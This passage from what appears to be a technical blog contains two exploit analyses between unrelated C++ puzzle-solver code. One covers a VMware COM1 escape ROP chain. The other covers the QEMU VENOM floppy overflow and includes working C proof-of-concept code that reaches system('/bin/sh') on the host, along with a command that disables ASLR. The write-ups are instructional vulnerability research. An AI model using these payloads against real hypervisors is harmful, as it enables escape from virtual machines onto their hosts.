if (!(fabs(itb->value - 0) < threHold)) // guard the divisor itb, not ita
{
result.insert(Node(ita->value / itb->value, "(" + ita->exp + "/" + itb->exp + ")"));
}
if (!(fabs(ita->value - 0) < threHold)) // guard the divisor ita, not itb
{
result.insert(Node(itb->value / ita->value, "(" + itb->exp + "/" + ita->exp + ")"));
}
}
}
return result;
}
void PointGameSolver::calc()
{
size_t n = init.size();
for (size_t i = 0; i < n; ++i)
{
S[static_cast<int>(pow(2, i))].insert(Node(init[i], to_string((int)init[i])));
}
for (size_t i = 1; i < pow(2, n); ++i)
{
S[i] = setS(i);
}
}
bool isValid(int *a, int n)
{
for (int i = 0; i < n; ++i)
{
if (a[i] < 1 || a[i] > 10)
return false;
}
return true;
}
int main() // portable entry point (was the MSVC-specific _tmain)
{
int data[4];
while (1)
{
cout << "Enter 4 numbers (1-10, separated by spaces): ";
int i = 0;
while (cin >> data[i++])
{
if (i == 4)
break;
}
if (cin && isValid(data, 4))
{
PointGameSolver pgs({ (double)data[0], (double)data[1], (double)data[2], (double)data[3] });
set<string> ans;
int count = pgs.getResult(ans);
if (!count)
{
cout << "no solution\n";
}
else
{
cout << "total solutions :" << count << endl;
for_each(ans.begin(), ans.end(), [](const string &s) {cout << s << endl; });
}
}
else
cout << "invalid input \n";
cout << "\n";
cout << "continue?(y/n):";
if (!cin)
cin.clear();
cin.ignore(numeric_limits<streamsize>::max(), '\n');
string str;
cin >> str;
if (str != "Y" && str != "y")
break;
}
return 0;
}
</code></pre></div></div>
<p>Since you have read all the way to the end, a bonus story: this was a UCloud interview question. Last night a UCloud interviewer called, said they work on network virtualization, and asked whether I was interested. We chatted casually, and just as I braced myself for a thorough grilling, he simply handed me this problem; very direct, rather in the dota spirit of "life and death aside, fight if unconvinced". Naturally I looked it up and found it was from "Beauty of Programming"; I followed the book's framework and only after finishing realized the problem also required printing every solution. I briefly considered saving expressions in a tuple, then realized a plain string was simpler, and replaced multiset&lt;double&gt; with multiset&lt;Node&gt;, where Node holds both a value and the expression that produced it. The result looks reasonably clean.</p>
Analysis of the VMware COM1 Virtual Machine Escape2015-08-04T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2015/08/04/vmware-com1-escap
<p>This article analyzes the exploit described in Google's <a href="https://docs.google.com/document/d/1sIYgqrytPK-CFWfqDntraA_Fwi2Ov-YBgMtl5hdrYd4/preview?sle=true">Escaping VMware Workstation through COM1</a>.</p>
<h3>1. Background</h3>
<p>For convenience, VMware lets a guest print files and save them on the host, with Microsoft XPS Document Writer as the default printer. The COM1 port is used to communicate with vprintproxy.exe on the host. When the guest prints a file, the EMFSPOOL and EMF files are handed to vprintproxy.exe for processing. Because TPView.dll inside vprintproxy.exe contains a buffer overflow, a malformed print file can take control of vprintproxy.exe and thereby execute arbitrary code on the host.</p>
<h3>2. Reproducing the Vulnerability</h3>
<p>Environment: host Windows 8.1, guest Windows 7, VMware 11.1.0 build-2496824, Python 3.4.3. Based on the document and my analysis, the bug reproduces as long as TPView.dll is version 8.8.856.1 and iconv.dll is version 1.9.0.1.</p>
<p>Tools: IDA 6.5 and x64dbg (here its 32-bit build, x32dbg).</p>
<p>First, the normal behavior: open a document in the guest and print it with the printer shown below, and the document is saved on the host.</p>
<p><img src="/assets/img/vmwarecom1/1.PNG" alt="" /></p>
<p>Running python.exe poc in the guest (<a href="/assets/file/vmwarecom1/poc">poc</a> is the code at the end of Google's document), vprintproxy.exe spawns a calculator process, as shown below.</p>
<p><img src="/assets/img/vmwarecom1/2.PNG" alt="" /></p>
<h3>3. Overall Analysis</h3>
<p>The overall flow is shown below.</p>
<p><img src="/assets/img/vmwarecom1/arch.PNG" alt="" /></p>
<p>The parts of Google's exploit that matter here are the overflow section and the SHELLCODE section. overflow floods the buffer and lays out the gadgets; it falls into two parts, called the first and second stage below in execution order. SHELLCODE does the actual work and can be any shellcode that runs on Windows 8.1.</p>
<p>The first four bytes of the first stage (first eip in the figure) overwrite the return address, the first step in controlling eip. The stage's main job is to place at 0x1010ff00 the difference VirtualAlloc - edi, 0x00078c48, so that VirtualAlloc's address can later be recovered dynamically; the value of edi exposed at the crash point is therefore crucial. The stage also lifts the stack top to the four bytes preceding overflow and then runs the second stage. The split exists because triggering the bug requires special data at a few fixed offsets, which would collide with the layout of first eip and the gadgets after it.</p>
<p>The second stage recovers VirtualAlloc's address dynamically, allocates 0x10000 bytes of executable memory, places special instructions in the first 0xC bytes at 0x40000000, and jumps there.</p>
<p>The code at 0x40000000 copies the SHELLCODE and other data, already in memory, to the region starting at 0x40000010, then jumps to 0x40000200, where a run of nop instructions slides into the SHELLCODE.</p>
<p>Since iconv.dll is the only module in the entire process loaded without address randomization, as figure 4 shows, the supply of usable gadgets is very thin, and the ROP construction is remarkably artful.</p>
<p><img src="/assets/img/vmwarecom1/3.PNG" alt="" /></p>
<h3>4. Detailed Analysis</h3>
<h4>4.1 Overwriting the Return Address</h4>
<p>From Google's document we know the overflow occurs at offset 0x48788 from TPView.dll's load base; with the actual base, that is 0x03208788, shown in x32dbg below.</p>
<p><img src="/assets/img/vmwarecom1/4.PNG" alt="" /></p>
<p>Analysis shows that the call at 0x03208797 copies two bytes at a time to esp+48 (with eip at 0x0320879); figure 6 shows the state after eight bytes have been copied (because of stack randomization, trust the values shown in the debugger).</p>
<p><img src="/assets/img/vmwarecom1/5.PNG" alt="" /></p>
<p>This corresponds to the start of overflow in the exploit. The copy count is held in ebx, 0xAC, so in theory 0xAC*2=0x158 bytes can be copied, and copying more than 0x4C bytes overflows the buffer and clobbers the return address. Running on to 0x032087ba, the stack is now entirely covered by overflow. Continuing, 0x03208882 reads esp+118 into edx, and the code later compares that value with itself plus one to choose a branch (at 0x032088a5); the branch must be taken, so overflow has to place 0x7fffffff at esp+118. Further on, 0x032089f8 reads four bytes from esp+110 into edx, and the instruction at 0x03208a01 writes through edx, so that address must be writable; this is why WRITABLE in the exploit is 1010ff00, in iconv.dll's .idata section. Note that edx stays 0x1010ff00 from here on. These two constraints, plus what must happen after eip is taken, mean the layout cannot simply flow top to bottom like a pipeline. The article's clever solution: lay out one part of the shellcode, lift the stack, then execute the second part.</p>
<h4>4.2 Executing the Second Stage of overflow</h4>
<p>The ret at 0x03208adf lands on our first eip, 0x1001cae4, a jump to InterlockedExchange; note edi at this point, whose value is closely tied to the location holding VirtualAlloc's address. The exploit makes heavy use of InterlockedExchange to plant data, which takes considerable skill. Control is now at 0x74ec2520, which plainly swaps [ecx] with eax, where eax and ecx come from esp+C and esp+8. ecx is 0x1010ff00 and eax is 0xf4, the distance from the start of overflow to its end; this value will shortly redirect control straight to the top of overflow. The following ret reaches 0x1001c595, which merely pops the earlier 0x1010ff00; the next ret is again 0x1001c595, popping more leftover data. eip then returns to 0x1001cae4, this time exchanging eax=0x00078c48 with the contents of ecx=0x1010ff00. This is especially clever, killing two birds with one stone: eax becomes 0xf4, the later argument to _alloca_probe, while 0x1010ff00 now holds 0x00078c48, which added to edi gives exactly the address that stores VirtualAlloc's address. Returning from this 0x1001cae4 lands at 0x1001c1e0, the address of _alloca_probe, which raises the stack by eax bytes; esp-0xf4 reaches the four bytes before overflow. Because eax and esp are swapped at 0x1001c1fb, eax then holds the old esp; next eax takes the value at esp, i.e. the value at the very bottom of overflow, 0x1001cae4, which is written to the stack top, now sitting at the first four bytes of overflow's first stage. The ret at 0x1001c201 goes straight to 0x1001cae4, and the first stage of overflow begins to execute.</p>
<h4>4.3 Executing the First Stage of overflow</h4>
<p>Execution begins with the code set up at 0x1001cae4 at the end of 4.2, the InterlockedExchange gadget, this time setting the value at 0x10110284 to 0x1001c594; 0x10110284 is the address of the _io_func function pointer, whose role is described below. Returning from this gadget reaches 0x1001c94c, which moves edx into eax and returns (note that edx has remained 1010ff00 ever since it was set, so eax is now 1010ff00). Control then reaches 0x100010b1, and at 0x100010b4 a call [100110284] executes; since that slot now holds 0x1001c594, the gadget does nothing and continues to 0x1001c594, which merely leads to the next gadget. Now at 0x1000cb5c, a dec eax, followed immediately by 0x10003d43, add dword ptr ds:[eax+1],edi, which sets the value at 0x1010ff00 to 0x00078c48+edi = 0x032812d8, exactly the address that stores VirtualAlloc's address. Because the instruction at 0x10003d94 also raises the stack by 0x10 bytes, control rets to 0x1001c594 again, pops a few pieces of earlier layout, reaches 0x10001116, which pops 0x1010fef8 into ebp, then 0x1001c120, which loads the value at ebp+8, i.e. at 1010ff00, into eax. Next comes the gadget at 0x10010b1, whose call [10110284] again pops layout data that is no longer needed. Then 0x1001c1fc places VirtualAlloc's address (in eax) into [esp] and rets; with the arguments already arranged on the stack, this allocates 0x10000 executable bytes at 0x40000000. There follow three more trips through the by-now familiar 0x1001cae4 gadget, which write 0x8b24438b, 0xa4f21470, and 0x01f3e9 into the first 0xC bytes of the freshly allocated region at 0x40000000, and then control jumps to 0x40000000.</p>
<h4>4.4 Executing the SHELLCODE</h4>
<p>These 0xC bytes form four instructions that copy the data at [esi], which includes the SHELLCODE, to 0x40000010, then jmp 0x40000200; after a nop sled, the SHELLCODE executes.</p>
<h3>5. Summary</h3>
<p>Two parts of this vulnerability strike me as hard. First, the EMFSPOOL, EMF, and JPEG2000 file formats: constructing a poc that triggers the bug is not easy. Second, the exploitation: with iconv.dll as the only source of gadgets, building the ROP chain is very difficult. As section 4 showed, overflow had to be split in two, with the stack alternately rising and falling, so the overflow layout must account for both states; the technique involved is exceptional. Altogether I consider it a nearly perfect exploit.
As both VENOM and this bug show, virtualization vulnerabilities (especially VM escapes) generally arise where the guest talks to the host. In KVM, the vm exit path into the kvm kernel module, and kvm's dispatch of I/O to qemu, are the main places such bugs appear. Since docker relies on isolation provided by the Linux kernel, a kernel vulnerability there is very likely to be serious.</p>
VENOM Vulnerability Analysis and Exploitation2015-06-26T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2015/06/26/venom
<p>This article analyzes the VENOM vulnerability and, with ASLR disabled, exploits it via ret2libc. The environment is Ubuntu 12.04 x86, kernel 3.2.57, qemu 2.2.0-rc1, a development machine readily available in our lab.</p>
<h3>1. Overview</h3>
<p>VENOM, CVE-2015-3456, discovered by Jason Geffner of CrowdStrike, is a vulnerability in QEMU's virtual floppy drive. Since QEMU's device model is widely used by KVM, Xen, and other virtualization software, the impact is considerable: an attacker exploiting it can escape the virtual machine and execute code on the host.</p>
<h3>2. Triggering the Bug</h3>
<p>According to mj's article on the <a href="http://blogs.360.cn/blog/venom-%E6%AF%92%E6%B6%B2%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%EF%BC%88qemu-kvm-cve%E2%80%902015%E2%80%903456%EF%BC%89/">360 technical blog</a>, the original poc may not trigger the bug; it did not for me either, so I used the poc from that article. (Some content below is also drawn from it; the repetition is only for completeness.) Running the poc crashes the VM process. The first version of the poc and the crash:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include <sys/io.h>
#include <stdio.h>
#define FIFO 0x3f5
int main()
{
int i;
iopl(3);
outb(0x08e,0x3f5);
for(i = 0;i < 10000000;i++)
outb(0x42,0x3f5);
return 0;
}
</code></pre></div></div>
<p><img src="/assets/img/venom/1.png" alt="" />
<img src="/assets/img/venom/2.png" alt="" /></p>
<p>eip is 42424242, so eip is presumably controllable. Below is a brief analysis of the bug, following mj's article.</p>
<h3>3. Vulnerability Analysis</h3>
<p>As the poc shows, apart from the iopl call that grants port access, it only executes outb instructions. Each one causes a vm exit into the kernel, where the kvm module dispatches the I/O to qemu; that is the rough flow (a code-level walkthrough is omitted here, and I would not claim to understand it completely). The poc keeps writing to the DATA FIFO port. In hw/block/fdc.c of the qemu source:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static const struct {
uint8_t value;
uint8_t mask;
const char* name;
int parameters;
void (*handler)(FDCtrl *fdctrl, int direction);
int direction;
} handlers[] = {
{ FD_CMD_READ, 0x1f, "READ", 8, fdctrl_start_transfer, FD_DIR_READ },
{ FD_CMD_WRITE, 0x3f, "WRITE", 8, fdctrl_start_transfer, FD_DIR_WRITE },
{ FD_CMD_SEEK, 0xff, "SEEK", 2, fdctrl_handle_seek },
{ FD_CMD_SENSE_INTERRUPT_STATUS, 0xff, "SENSE INTERRUPT STATUS", 0, fdctrl_handle_sense_interrupt_status },
{ FD_CMD_RECALIBRATE, 0xff, "RECALIBRATE", 1, fdctrl_handle_recalibrate },
{ FD_CMD_FORMAT_TRACK, 0xbf, "FORMAT TRACK", 5, fdctrl_handle_format_track },
{ FD_CMD_READ_TRACK, 0xbf, "READ TRACK", 8, fdctrl_start_transfer, FD_DIR_READ },
{ FD_CMD_RESTORE, 0xff, "RESTORE", 17, fdctrl_handle_restore }, /* part of READ DELETED DATA */
{ FD_CMD_SAVE, 0xff, "SAVE", 0, fdctrl_handle_save }, /* part of READ DELETED DATA */
{ FD_CMD_READ_DELETED, 0x1f, "READ DELETED DATA", 8, fdctrl_start_transfer_del, FD_DIR_READ },
{ FD_CMD_SCAN_EQUAL, 0x1f, "SCAN EQUAL", 8, fdctrl_start_transfer, FD_DIR_SCANE },
{ FD_CMD_VERIFY, 0x1f, "VERIFY", 8, fdctrl_start_transfer, FD_DIR_VERIFY },
{ FD_CMD_SCAN_LOW_OR_EQUAL, 0x1f, "SCAN LOW OR EQUAL", 8, fdctrl_start_transfer, FD_DIR_SCANL },
{ FD_CMD_SCAN_HIGH_OR_EQUAL, 0x1f, "SCAN HIGH OR EQUAL", 8, fdctrl_start_transfer, FD_DIR_SCANH },
{ FD_CMD_WRITE_DELETED, 0x3f, "WRITE DELETED DATA", 8, fdctrl_start_transfer_del, FD_DIR_WRITE },
{ FD_CMD_READ_ID, 0xbf, "READ ID", 1, fdctrl_handle_readid },
{ FD_CMD_SPECIFY, 0xff, "SPECIFY", 2, fdctrl_handle_specify },
{ FD_CMD_SENSE_DRIVE_STATUS, 0xff, "SENSE DRIVE STATUS", 1, fdctrl_handle_sense_drive_status },
{ FD_CMD_PERPENDICULAR_MODE, 0xff, "PERPENDICULAR MODE", 1, fdctrl_handle_perpendicular_mode },
{ FD_CMD_CONFIGURE, 0xff, "CONFIGURE", 3, fdctrl_handle_configure },
{ FD_CMD_POWERDOWN_MODE, 0xff, "POWERDOWN MODE", 2, fdctrl_handle_powerdown_mode },
{ FD_CMD_OPTION, 0xff, "OPTION", 1, fdctrl_handle_option },
{ FD_CMD_DRIVE_SPECIFICATION_COMMAND, 0xff, "DRIVE SPECIFICATION COMMAND", 5, fdctrl_handle_drive_specification_command },
{ FD_CMD_RELATIVE_SEEK_OUT, 0xff, "RELATIVE SEEK OUT", 2, fdctrl_handle_relative_seek_out },
{ FD_CMD_FORMAT_AND_WRITE, 0xff, "FORMAT AND WRITE", 10, fdctrl_unimplemented },
{ FD_CMD_RELATIVE_SEEK_IN, 0xff, "RELATIVE SEEK IN", 2, fdctrl_handle_relative_seek_in },
{ FD_CMD_LOCK, 0x7f, "LOCK", 0, fdctrl_handle_lock },
{ FD_CMD_DUMPREG, 0xff, "DUMPREG", 0, fdctrl_handle_dumpreg },
{ FD_CMD_VERSION, 0xff, "VERSION", 0, fdctrl_handle_version },
{ FD_CMD_PART_ID, 0xff, "PART ID", 0, fdctrl_handle_partid },
{ FD_CMD_WRITE, 0x1f, "WRITE (BeOS)", 8, fdctrl_start_transfer, FD_DIR_WRITE }, /* not in specification ; BeOS 4.5 bug */
{ 0, 0, "unknown", 0, fdctrl_unimplemented }, /* default handler */
};
</code></pre></div></div>
<p>The FIFO command relevant to the poc is:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>FD_CMD_DRIVE_SPECIFICATION_COMMAND = 0x8e
</code></pre></div></div>
<p>The 0x42 bytes are passed to the handler as parameters of that command; here the handler is</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>fdctrl_handle_drive_specification_command
</code></pre></div></div>
<p>When qemu receives a FIFO command, it uses the command ID to find the entry in the handlers array, then keeps accepting the declared number of parameters, storing the command ID and parameters in a buffer. Once all parameters have been received, the corresponding handler is called. The whole FIFO write path lives in fdctrl_write_data:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static void fdctrl_write_data(FDCtrl *fdctrl, uint32_t value)
{
...
/* handle the command byte */
if (fdctrl->data_pos == 0) {
/* Command */
pos = command_to_handler[value & 0xff];
FLOPPY_DPRINTF("%s command\n", handlers[pos].name);
fdctrl->data_len = handlers[pos].parameters + 1;
fdctrl->msr |= FD_MSR_CMDBUSY;
}
/* store the command and its parameters in fdctrl->fifo */
fdctrl->fifo[fdctrl->data_pos++] = value;
if (fdctrl->data_pos == fdctrl->data_len) {
/* We now have all parameters
* and will be able to treat the command
*/
if (fdctrl->data_state & FD_STATE_FORMAT) {
fdctrl_format_sector(fdctrl);
return;
}
pos = command_to_handler[fdctrl->fifo[0] & 0xff];
FLOPPY_DPRINTF("treat %s command\n", handlers[pos].name);
(*handlers[pos].handler)(fdctrl, handlers[pos].direction);
}
}
</code></pre></div></div>
<p>Once all required parameters have been collected, the matching handler runs; for 0x8e that is fdctrl_handle_drive_specification_command:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static void fdctrl_handle_drive_specification_command(FDCtrl *fdctrl, int direction)
{
FDrive *cur_drv = get_cur_drv(fdctrl);
if (fdctrl->fifo[fdctrl->data_pos - 1] & 0x80) {
/* Command parameters done */
if (fdctrl->fifo[fdctrl->data_pos - 1] & 0x40) {
fdctrl->fifo[0] = fdctrl->fifo[1];
fdctrl->fifo[2] = 0;
fdctrl->fifo[3] = 0;
fdctrl_set_fifo(fdctrl, 4);
} else {
fdctrl_reset_fifo(fdctrl);
}
} else if (fdctrl->data_len > 7) {
/* ERROR */
fdctrl->fifo[0] = 0x80 |
(cur_drv->head << 2) | GET_CUR_DRV(fdctrl);
fdctrl_set_fifo(fdctrl, 1);
}
}
</code></pre></div></div>
<p>By controlling the data fed into the fifo we can fail both if conditions, so neither fdctrl_set_fifo nor fdctrl_reset_fifo is called; these are precisely the functions that clear the fifo buffer and control whether it may be written. outb can then be used to write into the fifo without limit. The fifo is a 512-byte buffer allocated with malloc, so writing past 512 bytes overwrites adjacent data and crashes the process.</p>
<h3>4. Locating eip</h3>
<p>Normally a process's heap is far from its code segment, with the heap in high addresses and text in low ones, so a heap overflow cannot directly overwrite eip. Here the overflow does reach eip, presumably by corrupting some dynamically allocated structure that influences it. I found no Linux equivalent of Immunity Debugger, so the choice was writing a pattern file or working by hand. Since the test VM had no network and copying files in was tedious, I located eip manually: about twenty minutes of binary search showed that roughly 1550 bytes trigger the bug. One issue initially made me think the eip offset was unstable: each trigger deletes the poc's contents, so rerunning the now-empty poc after restarting the guest naturally did not crash (more on this later). With the rough position known, gdb settled it: the 4 bytes following the first 1516 bytes overwrite eip. The second version of the poc and the resulting crash:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include <sys/io.h>
#include <stdio.h>
#define FIFO 0x3f5
int main()
{
int i;
iopl(3);
outb(0x08e,0x3f5);
for(i = 0;i < 1515;i++)
outb(0x42,0x3f5);
for(i = 0;i < 4;i++)
outb(0x43,0x3f5);
for(i = 0;i < 50;++i)
outb(0x44,0x3f5);
return 0;
}
</code></pre></div></div>
<p><img src="/assets/img/venom/3.png" alt="" /></p>
<p>The process crashes as expected with eip 43434343; the location is exact.</p>
<h3>5. Root Cause</h3>
<p>As section 4 noted, overflowing a heap buffer alone cannot overwrite eip; this section analyzes why it happens here.
Start the qemu process under gdb, set the arguments, run, and execute the poc inside the guest.</p>
<p><img src="/assets/img/venom/4.png" alt="" /></p>
<p>The guest crashes as expected; bt shows the last frame is aio_bh_poll, line 82 of async.c.</p>
<p><img src="/assets/img/venom/5.png" alt="" /></p>
<p>Line 82 of aio_bh_poll executes bh->cb(bh->opaque);, invoking a callback stored in a QEMUBH structure. The picture is now clear: QEMUBHs form a linked list via next, each allocated with malloc on the VM process's heap; the QEMUBH adjacent to fdctrl->fifo gets overwritten, so aio_bh_poll calls through a corrupted eip. The rough layout:</p>
<p><img src="/assets/img/venom/6.png" alt="" /></p>
<p>While analyzing this part I learned that the aio poll runs in the main thread and handles a certain class of blocking I/O.</p>
<h3>6. Exploitation</h3>
<p>With the details understood, the next step is exploitation. qemu is a very large program that allocates a great deal of heap data, so there is essentially no size limit on the payload. With full control of eip and a nearly unconstrained payload, bypassing ASLR and DEP would make this a truly elegant exploit, executing arbitrary code in the VM process. This was my first Linux exploit, and I am not fluent in Linux ASLR/DEP bypasses (it has been a while for Windows too, though I remember there being plenty of methods). The Linux ROP articles I found online are all dated; with every module's load base randomized, it seems one needs a bug-specific way to leak a module or function address before going further. So I simply turned ASLR off:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
</code></pre></div></div>
<p>Setting ASLR aside, a simple ret2libc runs /bin/sh via system. I had been wondering how to arrange the argument, expecting to have to pivot the stack, when it struck me: right after the overwritten callback pointer comes its argument. Perfect: just place the address of /bin/sh after eip. The figure below shows finding the system function and the "/bin/sh" string.</p>
<p><img src="/assets/img/venom/7.png" alt="" /></p>
<p>Here is the third version of the poc:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include <sys/io.h>
#include <stdio.h>
#define FIFO 0x3f5
int main()
{
int i;
iopl(3);
outb(0x08e,0x3f5);
for(i = 0;i < 1515;i++)
outb(0x42,0x3f5);
outb(0x10,0x3f5);
outb(0xce,0x3f5);
outb(0xe6,0x3f5);
outb(0xb7,0x3f5);
outb(0xb8,0x3f5);
outb(0x50,0x3f5);
outb(0xe1,0x3f5);
outb(0xb7,0x3f5);
for(i = 0;i < 50;++i)
outb(0x44,0x3f5);
return 0;
}
</code></pre></div></div>
<p>The final result: run the poc in the guest, and the corresponding qemu process on the host opens /bin/sh.</p>
<p><img src="/assets/img/venom/8.png" alt="" /></p>
<p><img src="/assets/img/venom/9.png" alt="" /></p>
<h3>7. Open Issues</h3>
<ol>
<li>The poc runs only once per guest session; running it again requires recompiling it. When first reproducing the bug, the crash was intermittent, and I assumed the eip offset could not be located reliably (a heap overflow under ASLR, after all). It turned out that each run zeroes out the poc file, so rerunning it after restarting the guest cannot succeed, hence the recompilation each time. My guess was that the kernel state at crash time is broken and the image of a running process gets wiped; I verified this by running a while(1) loop test program alongside the poc, and the test program's file was indeed emptied. This is genuinely awkward to solve; one hacky workaround is to have the poc copy itself before running.</li>
<li>ASLR. If ASLR can be bypassed, constructing the rest of the ROP chain should not be a major problem, and arbitrary code execution should be achievable, which makes this vulnerability quite potent.</li>
</ol>
<h3>8. Problems Encountered</h3>
<ol>
<li>Locating eip. I had never hand-written a Linux exploit, only used metasploit; on Windows I always used Immunity Debugger to find eip, so here a rough binary search had to do.</li>
<li>I tried placing shellcode on the heap, but bytes in the middle of the payload were sometimes overwritten, presumably by the process's own heap bookkeeping; something to watch for in future layouts.</li>
</ol>
<h3>9. References</h3>
<ol>
<li><a href="http://blogs.360.cn/blog/venom-%E6%AF%92%E6%B6%B2%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%EF%BC%88qemu-kvm-cve%E2%80%902015%E2%80%903456%EF%BC%89/">VENOM vulnerability analysis (qemu kvm CVE-2015-3456)</a></li>
</ol>
<p>Incidentally, 360's technical blog is excellent; I have learned a great deal from mj, pjf, wowocock, and the other experts there.</p>
<ol>
<li><a href="http://drops.wooyun.org/tips/6597">Learning ROP Step by Step: linux_x86</a></li>
</ol>
Trie Trees and Word Puzzles2014-11-07T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2014/11/07/trie-tree-word-puzzles
<p>I recently ran into a word-puzzle problem in a book: given a letter grid and a list of words, find each word in the grid along any of the eight directions (horizontal, vertical, and diagonal). For example, given the following grid and words (this is an online-judge problem):</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>MARGARITA, ALEMA, BARBECUE, TROPICAL, SUPREMA, LOUISIANA, CHEESEHAM, EUROPA, HAVAIANA, CAMPONESA
</code></pre></div></div>
<p><img src="/assets/img/trie/1.jpg" alt="" /></p>
<p>The first three words are marked above.</p>
<p>The simplest approach is brute force, scanning the whole grid once per word, but that is clearly too slow. After some reading, a trie turns out to be a good fit for this problem. A brief introduction first.</p>
<h3>A Brief Introduction to Tries</h3>
<p>A trie, also called a dictionary tree, word-lookup tree, or prefix tree, is a multi-way tree for fast retrieval: a trie over English letters is a 26-way tree, one over digits a 10-way tree. Tries are typically used to count and sort large numbers of strings (not only strings), so search engines often use them for word-frequency statistics. Their advantage: they minimize unnecessary string comparisons, and lookups can be faster than a hash table.</p>
<p>A trie saves space by exploiting common prefixes. The trie below stores the six strings tea, ten, to, in, inn, and int in 10 nodes:</p>
<p><img src="/assets/img/trie/2.jpg" alt="" /></p>
<p>The basic properties of a trie:</p>
<ul>
<li>The root contains no character; every other node contains exactly one.</li>
<li>The string for a node is the concatenation of the characters along the path from the root to that node.</li>
<li>The children of a node all contain distinct characters.</li>
</ul>
<p>Here is a simple trie implementation; the code is easy to follow alongside the figure below.</p>
<p><img src="/assets/img/trie/3.png" alt="" /></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define ALPHABET_SIZE 26
struct node
{
int data;
struct node *link[ALPHABET_SIZE];
};
struct node *create_node()
{
struct node *q = (struct node*)malloc(sizeof(struct node));
for (int i = 0; i < ALPHABET_SIZE; ++i)
{
q->link[i] = NULL;
}
q->data = -1;
return q;
}
void insert_node(struct node* root, char *key)
{
int length = strlen(key);
struct node *q = root;
int i = 0;
for (i = 0; i < length; ++i)
{
int index = key[i] - 'a';
if (q->link[index] == NULL)
{
q->link[index] = create_node();
}
q = q->link[index];
}
q->data = i;
}
int search(struct node *root, char *key)
{
struct node *q = root;
int length = strlen(key);
int i = 0;
for (i = 0; i < length; ++i)
{
int index = key[i] - 'a';
if (q->link[index] != NULL)
q = q->link[index];
else
break;
}
if (key[i] == '\0' && q->data != -1)
return q->data;
return -1;
}
void del(struct node *root)
{
if(root == NULL)
return;
for (int i = 0; i < ALPHABET_SIZE; ++i)
{
del(root->link[i]);
}
free(root);
}
int main()
{
struct node *root = create_node();
insert_node(root, "by");
insert_node(root, "program");
insert_node(root, "programming");
insert_node(root, "datastructure"); /* keys must be lowercase letters only: the child index is key[i] - 'a' */
insert_node(root, "coding");
insert_node(root, "code");
printf("Search value:%d\n", search(root, "code"));
printf("Search value:%d\n", search(root, "geeks"));
printf("Search value:%d\n", search(root, "coding"));
printf("Search value:%d\n", search(root, "programming"));
del(root);
}
</code></pre></div></div>
<h3>Word Puzzles</h3>
<p>The main idea: build a trie from the word list, then for each cell of the grid and each of the eight directions, walk outward and check the path against the trie. Since I personally dislike global variables, this version is in C++ with some C++11; C++11 code still feels delightfully slick.</p>
<p>The input:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>20 20 10
QWSPILAATIRAGRAMYKEI
AGTRCLQAXLPOIJLFVBUQ
TQTKAZXVMRWALEMAPKCW
LIEACNKAZXKPOTPIZCEO
FGKLSTCBTROPICALBLBC
JEWHJEEWSMLPOEKORORA
LUPQWRNJOAAGJKMUSJAE
KRQEIOLOAOQPRTVILCBZ
QOPUCAJSPPOUTMTSLPSF
LPOUYTRFGMMLKIUISXSW
WAHCPOIYTGAKLMNAHBVA
EIAKHPLBGSMCLOGNGJML
LDTIKENVCSWQAZUAOEAL
HOPLPGEJKMNUTIIORMNC
LOIUFTGSQACAXMOPBEIO
QOASDHOPEPNBUYUYOBXB
IONIAELOJHSWASMOUTRK
HPOIYTJPLNAQWDRIBITG
LPOINUYMRTEMPTMLMNBO
PAFCOPLHAVAIANALBPFS
MARGARITA
ALEMA
BARBECUE
TROPICAL
SUPREMA
LOUISIANA
CHEESEHAM
EUROPA
HAVAIANA
CAMPONESA
</code></pre></div></div>
<p>20 is the grid size; 10 is the number of words.</p>
<p>Output: coordinates plus direction</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0 15 G
2 11 C
7 18 A
4 8 C
16 13 B
4 15 E
10 3 D
5 1 E
19 7 C
11 11 H
</code></pre></div></div>
<p>The code:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include <iostream>
#include <fstream>
#include <vector>
#include <algorithm>
#include <iterator>
#include <string>
#include <tuple>
using namespace std;
struct Node
{
int data;
struct Node *child[26];
};
class WordPuzzles
{
public:
WordPuzzles(ifstream &in);
void insert_node(string word, int num);
void search_words(int x, int y, int dir);
void do_work();
private:
Node *create_node()
{
Node *q = new Node();
q->data = -1;
for (int i = 0; i < 26; ++i)
{
q->child[i] = NULL;
}
return q;
}
static int dx[8]; // the eight search directions
static int dy[8];
int row, col, counts;
vector<string> wordmap, words;
vector<tuple<int, int, int, char>> ans;
Node *root;
};
int WordPuzzles::dx[] = { -1, -1, 0, 1, 1, 1, 0, -1 };
int WordPuzzles::dy[] = { 0, 1, 1, 1, 0, -1, -1, -1 };
WordPuzzles::WordPuzzles(ifstream &in)
{
in >> row >> col >> counts;
printf("the row is:%d,col is:%d,counts is:%d\n", row, col, counts);
for (int i = 0; i < row; ++i)
{
string str;
in >> str;
wordmap.push_back(str);
}
cout << "the map is " << endl;
copy(wordmap.begin(), wordmap.end(), ostream_iterator<string>(cout, "\n"));
for (int i = 0; i < counts; ++i)
{
string str;
in >> str;
words.push_back(str);
}
cout << "the words is " << endl;
copy(words.begin(), words.end(), ostream_iterator<string>(cout, "\n"));
